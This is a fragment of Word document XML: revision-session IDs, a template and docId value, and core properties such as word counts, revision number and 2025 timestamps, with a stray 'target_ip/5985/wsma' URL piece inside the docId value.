    <w:tmpl w:val="17A2119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27186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B3"/>
    <w:rsid w:val="00130AC9"/>
    <w:rsid w:val="001E17BD"/>
    <w:rsid w:val="002A1FFF"/>
    <w:rsid w:val="002E5D6B"/>
    <w:rsid w:val="003A08CC"/>
    <w:rsid w:val="003C6FEF"/>
    <w:rsid w:val="003D35CB"/>
    <w:rsid w:val="00445827"/>
    <w:rsid w:val="004A5F46"/>
    <w:rsid w:val="0052758E"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00587813"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="005D6413"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00916F76"/>
    <w:rsid w:val="00A10CFB"/>
    <w:rsid w:val="00A8237E"/>
    <w:rsid w:val="00AB55B3"/>
    <w:rsid w:val="00AF3766"/>
    <w:rsid w:val="00BB268D"/>
    <w:rsid w:val="00D35819"/>
    <w:rsid w:val="00DF746A"/>
    <w:rsid w:val="00E5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A5DC0"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D88B7A1D-8B50-4AA9-86D7-0D98B059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5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58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819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3581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3581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358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target_ip/5985/wsma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arget_ip/59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6281A-A99A-461D-AA51-AF6DD5673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242</Words>
  <Characters>1983</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>82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35</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-06T05:44:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-06T06:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>